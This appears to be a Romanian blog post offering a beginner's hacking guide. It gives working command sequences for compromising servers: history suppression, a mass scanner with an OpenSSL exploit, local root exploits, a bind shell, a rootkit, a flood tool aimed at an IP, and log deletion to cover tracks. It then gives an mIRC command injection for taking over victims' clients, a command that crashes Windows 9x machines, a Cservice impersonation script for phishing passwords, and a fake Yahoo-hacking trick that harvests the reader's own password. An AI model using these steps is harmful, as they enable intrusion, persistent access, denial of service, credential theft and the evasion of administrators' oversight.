Comenzi linux folosite in PuTTy:
In urmatoarele randuri va voi arata din mare cateva comenzi,programe,exploituri cu care pot incepe cei care vor sa se apuce de hack; precizez ca aia care au experienta in domeniu nau rost sa citeasca aceste randuri cai vor plictisii.
Sa incepem:
Sa zicem ca ai primit un root.
Ok.
Intrii pe el cu user si pass si ca au mers; imediat dupa ce ai intrat tre sa dai urmatoarele comenzi pt a nu salva anumite chestii pe care le faci pe root si astfel sa te vada administratorul serverului ( rutului ):
unset HISTFILE
unset HISTSAVE
history -n
unset WATCH
export HISTFILE=/dev/null
Aici sunt catea comenzi utile pe care le puteti face pe root cu explikatie cu tot:
w , uptime = arata de cate zile este serverul sus
id, whoami = arata dreptul pe care il avem pe root: apache sau root
ls, dir = arata continutul unui folder
rm -rf = aterge un folder sau fisier
Impachetez un fisier -> tar chf fisier.tar fisier
-> tar zcd fisier.tar director
Vad ip la un server -> ping -c1 yahoo.com
/sbin/ipchains -A input --destination-port -p tcp -j REJECT
route add -host ip-ul reject -> Inchid un port anume
cat /proc/cpuinfo -> Informatii despre sistem
rpm -Uhv arhiva -> despachetez arhiva rpm
gzip -9 ex.tar -> modifik extensia tar in tar.gz
/usr/sbin/useradd -o -u 0 http -> fak shell
cat /etc/issue -> vad versiunea de linux
gcc program.c -o program -> compilez un program
df -h -> vad cat re hardu
/etc/rc.d/init.d -> Afisate Pidurile
cat /etc/hosts -> Vad Vhosturile
netstat -aut -> VAd cine mai ii pe roata
cat /etc/*release -> Vad versiunea de linux
cat /etc/hosts -> Vad hosturile
alias ls='dir --color=tty'-> Bag ls
/usr/sbin/userdel user -> Sterg user
find / -name ".. " -print -xdev ->caut foldere ascunse
find / -name ".*" -print -xdev | cat -v ->caut foldere ascunse
Daca vreti sa va faceti bnc aveti aici comenzile necesare :
wget hacktrade.org/psybnc/psybnc-linux.tar (introduci arhiva in root )
tar xzvf psybnc-linux.tar (despacheteaza arhiva)
cd psybnc (intru in folderul bnc-ului)
mv psybnc bash (mut executabilul de la bnc pe un executabil mai ascuns)
./psybnc
Asa ai bnc admin pe portu care lai setat mai sus cu pico pe ip pe care ii rootu
In caz ca nu aveti comanda "pico" folositi comanda "mc" ;ar fi mai multe dar is putin mai complikate , atunci cel mai bine luati arhiva de pico de aici:
rpm -vhU --force ftp://ftp.rpmfind.net/linux/sourceforge ... 7.i386.rpm
De aici:
wget www.geocities.com/fidel_ul/mek.tgz
Voi nu tre sa modifikati numai fisierul "mech.session" unde veti trece canalul unde vor intra botii prima data pe net si "emech.users" unde va puneti voi owner la boti si pe care host veti avea 100 - acces maxim la boti
puteti modifika fisierele respective folosit Norton Comander sau pico de pe root-ul respectiv salvand arhiva dupa ce ati modifikato
Ok.....deja aveti si bot si bnc pe root... sa zicem ca mai vreti sal folositi sa aveti rooatele voastre fara sa fie primite de la cineva
Atunci va trene un mass scanner de servere apache ;scanner pe care lam folosit si yo inainte sami prokur roote nu numai din scanat
Il puteti lua de aici:
wget www.yupy.3x.ro/atd.tgz
tar zxvf atd.tgz
rm -rf atd.tgz
cd atd
Acuma tre sa dati urmatoarele comenzi:
./mass -s 1000 ip -l x
exemplu: ./mass -s 1000 217.129.*.* -l x
Dupa ce au trecut cateva minute bune (vreo 30 min si sa fiti gasit cel putin vreo 300 ip, ex (found: 384) il opriti cu comanda ctrl+c
si dupa aia dati comanda:
./osslmass2 x
Acuma asteptati pt a intra in servere.O sa arate cam asa ceva:
Attacking: 213.203.196.185
: OpenSsl Exploit ... Folositi-l Pe Riscul Vostru
by Silviu
Deschid 30 Conexiuni
Stabilesc Conexiunea Ssl
: Incercare De Deschidere...
Connection unexpectedly closed
Daca la vreun ip va arata:
In Executie ...
Conexiune Stabilita...Bravo ..Esti Hacer ;>>
Inseamna ca ati intrat pe un server apache....
Atunci tre sa intrati intrun folder temporal;exemoplu /var/tmp sau /tmp
Veti intra asa: cd /var/tmp
Acolo veti lua o arhiva de exeploit local ca sa la puteti lua drept de root putanduva deschide un port cu user si parola
De aici luati exploitul:
wget www.x-type.go.ro/mirk/SSLROOT.GZ
tar zxvf SSLROOT.GZ
rm -rf SSLROOT.GZ
./sslroot
Daca nu va arata din prima "U got a root shell" mai dati de cateva ori ./sslroot pina va apare
ok... acuma sunteti pe root pe respectivul server(nu toate serverele va permite sa aveti acest drept)
Acuma va puteti deschide un port pe 4000 ca sa puteti intra cand vreti pe el dupa ce ati terminat de scanat cu scanerul de pe care ati inrrat pe el
wget http://www.geocities.com/ndg_ro/za.tgz
tar zxvf za.tgz
rm -rf za.tgz
cd za
./zbind
Dupe ce ati dat asta o sa aveti root fara user si pass doar ip pe serveru la care va zis aia cu bravo esti hacer pe port 400
Cel mai bine ar fi sa folositi un rk pt ca veti avea user root si parola care veo alegeti astfel ne putant intra nimeni care va stie ip-ul cum ar fi daca avea avea zbind pe el
wget haceri-in-actiune.info/rk.tar.gz
tar zxvf rk.tar.gz
rm -rf rk.tar.gz
cd rk
./setup
portul o sa fie: 6969
Dupa acestia veti avea root pe ip pe care ati bagat rk cu user:root si pass: ala care lati ales cand ati dat ./setup
Acuma tre sa va securizati rootul ca sa nu mai intre nimeni peste voi
Cel mai simplu editati "httpd.conf" din /etc
Cautati in fisierul respectiv unde apare "sslengine"
Acolo o sa va apara "on" dar voi modifikati si puneti "off" dupa care dati comanda:
service httpd reload
Hm... sa zicem ca vreti sal floodati pe cineva pt ca va suparat...aici aveti arhiva si comenzile sa terminati cu nemernikulP
wget r3dstorm.com/meg.tgz
tar -xzf meg.tgz
rm -rf meg.tgz
cd meg/bin
./stealth ip port
ex ./stealth 193.230.212.70 22
Acuma dupa ce ati fakut atatea chestii pe root tre sa va stergeti urma stergand urmatoarele fisiere:
rm -rf .bash_history
rm -rf /var/run/utmp
rm -rf /var/run/wtmp -
rm -rf /var/log/lastlog
rm -rf /usr/adm/lastlog
rm -rf .bash_history
cd /var/log/
rm -rf wtmp
rm -rf secure
rm -rf lastlog
rm -rf messages
touch messagess
touch wtmp
touch secure
touch lastlog
cd /root
rm -rf .bash_history
touch .bash_history
Acuma puteti iesii linistit de pe rootPP
Daca aveti probleme ,nelamuriri !! da`ti pe irc /q Loadingz daca am timp o sa vb cu voi !
Ash dori sa va prezint ceva interesant si cateodata foarte UTILE
Fraierii de pe MIrc pot fi shi mai fraieri daca ii ajutatzi putzin. CUM? Simplu.
Prin intermediul unei comenzi putetzi sa ii controlatzi mircu in intregime. Nu trebuie decat sa ii pui sa scrie urmatoarea comanda si prin intermediul unor altor comenzi simple va jucatzi cu mircul lui.
Acum sa nu mai stau la vorbaraie shi sa va dau comanda:
//me :-) | write -c x ctcp 1:*:?:$1- | //me : | .load -rs x
Odata ce a scris comanda uu va aparea in locul in care a scriso urmatoarele semne:
:-)
: /
Dupa ele stitzi ca victima a pus comanda ! Odata ce a pus-o vetzi avea acces ctcp pe toate comenzile mircului!!!
Acum folositzi urmatoarele comenzi :
/ctcp nick /msg nick-sau-canal mesaj aceasta va face ca prin intermediul nickului victimei sa scrietzi ce text vretzi unde vretzi !!!
/ctcp nick /join #canal aceasta comanda va face ca victima sa intre pe canalul dorit;
/ctcp nick /part #canal aceasta comanda va face ca victima sa iese de pe canalul dorit;
/ctcp nick /disconnect aceasta comanda va face ca victima sa iese de pe MIRC;
/ctcp nick /clearscreen aceasta comanda ii va shterge victimei tot scrisu din mirc.. astfel nu va mai vedea nimik din ce a vorbit
Atzi prins ideea? Ma bucur.. dar mai am o comanda frumoasa in caz ca victima va injurat sau enervat prea mult:
/ctcp nick /run c:concon Aceasta comanda ii va bloca automat computeru (ATENTZIE: merge numai pe 98, 95 ,Me)
NOTA: Daca personana e suspecta de comanda de mai sus putetzi incerca direct /run c:concon shi ii vetzi bloca direct copmuterul.
SFAT: Nu ezitatzi niciodata sa folositzi mesaje cat mai atractive pentru acea comanda .
Pentru ca fraierii de pe mirc sunt chiar foarte fraieri (cel putzin unii, ca mai sunt shi exceptzii) putetzi sa ii pacalitzi prin intermediul mesajelor folosind /ame mesaj(scrie acelashi mesaj pe toate canalele) sau /notice #canal-sau-nick mesaj(notifica un canal sau o persoana cu un mesaj) sau chiar scriindu-i in privat un mesaj.
Pentru aceasta va voi da mai multe exemple:
1. Sa incepem cu comanda //me :-) | write -c x ctcp 1:*:?:$1- | //me : | .load -rs x :
- in ea putetzi modifica scrisul :-) si : asha ca o idee si scoatetzi un mesaj ca sa fraieritzi victima. Cum ar fi:
//me mp3-list | write -c x ctcp 1:*:?:$1- | //me *.mp3 | .load -rs x ar face sa kreada ca victima itzi va vedea mp3-urile tale... insa nu e destul; mai trebuie sa intervenitzi shi voi cu un mesaj.. Astfel avem un exemplu complet:
Daca vretzi sa imi vedetzi lista de mp3uri scrietzi comanda: //me mp3-list | write -c x ctcp 1:*:?:$1- | //me *.mp3 | .load -rs x
Daca vretzi mai multe exemple doar ganditziva shi vetzi gasi !
2. Acum sa va dau ceva mai interesant : Cum furatzi usere sub nasul vitimelor.
Presupun ca va ganditzi la metode de hacking complicate si grele.. dar totul e mai mult decat simplu.. Totul se intampla prin intermediul unui mesaj. Mai intai schimbatzi-va nickul in Cserv1ce sau Cs3rvice sau ceva asemanantor: Acum scrietzi urmatorul mesaj prin notice pe cat mai multe canale:
/notice #canal Din cauza de prea multe usere serverul undernet este laguit, asha ca Cservice a hotarat suspendarea tuturor userelor !! Daca vrei sa nu tzi se suspende scrie urmatoarea comanda /msg nickul-tau(Cserv1ce sau Cs3rvice) -suspend me | username |password
Astfel fraierul itzi va da propia parola la propiul user ! Insa el ishi poate recupera parola de la mailul sau asha ca incercatzi sa ceretzi shi parola de la mail !!!
Pentru cei care nu folosesc Mircu delok am sa le dau toate detaliile in caz ca vretzi sa va batetzi joc de nishte fraieri:
Deci dupa ce atzi intrat pe mirc, intratzi pe cat mai multe canale shi bagatzi comanda de mai sus ! Dar mai intai scrietzi
/nick Cserv1ce ca sa va schimbatzi nickul in Cserv1ce. Sa zicem ca intratzi pe canalul #HaCer`S shi vretzi sa bagatzi mesajul pentru furat usere.. comanda va fi in cazul asta: /notice # Din cauza de prea multe usere serverul undernet este laguit, asha ca Cservice a hotarat suspendarea tuturor userelor !! Daca vrei sa nu tzi se suspende scrie urmatoarea comanda /msg Cserv1ce -suspend me | username | password . Acum trebuie sa prindetzi fraierii care itzi vor da mesaj userul shi passul . In caz ca ai primit un mesaj din acesta ai prins un fraier .. Insa atentzie ca mai sunt care dau la panarama user shi pass.
Daca nu ai intzeles prea bine sau vrei sa stii mai multe intra pe #HaCer`S .. yo sunt cu nickul Loadingz !!!
3. Acum sa va zic de ce putetzi profita foarte mult pe mirc de pe urma fraierilor.. Daca ai nevoie de multe voturi nu ezita sa intri pe cat mai multe canale shi cu ajutorul comenzii /ame bagatzi mesaje cat mai infloritoare cum ar fi:
- daca vrei root shi bnc gratis da click pe urmatoarea adresa
- daca vrei sa trimitzi sms-uri gratis intra pe urmatorul site si da click pe VOT !!!
ASha vetzi fi votat de fraieri care kred in mesajele alea! Deasemeni putetzi acoperi mesajul de o culoare shi zicetzi dublu click pe culoare . Idei sunt multe !! Yo va mai dau un lucru care va poate ajuta la vot :
CUM SA HACKUIESTI MAIL YAHOO !!!!
Pasul 1: intri pe contul tau la yahoo(sau la alt serviciu de mail) compui un nou email pe care il vei trimite la
: E-mail
Pasul 2: ce scrii in acest email: la subject scri: "usrpsw" + username-ul persoanei care vrei sa ii afli parola,
pe urma alaturi ,in paranteza scrii userul tau! (toate astea la subject este f important)>
Pasul 3: acum ce scri : " id;psw;id_forgot;psw_forgot;usr:nume1 ! my_pswis:parola;my_usr:nume2;yahoobotservice "
fii atent aici:in loc de nume1 scrii numele userului care vrei sa ii afli parola(de obicei userul e ce e inainte de @),
in loc de parola scri parola ta de la contul tau(atentie ea trebuie sa fie reala pentru autentificare),
in loc de nume2 srci userul tau(tot real pentru verificare),
vezi sa scri exact cum este scris aici intre ghilimele fiindca altfel nu functioneaza!!!!
Pasul 4:acum astepti vreo 4-5 minute si vei primi un mail cu parola care o vrei !!!!
Succes.
Niciun comentariu:
Trimiteți un comentariu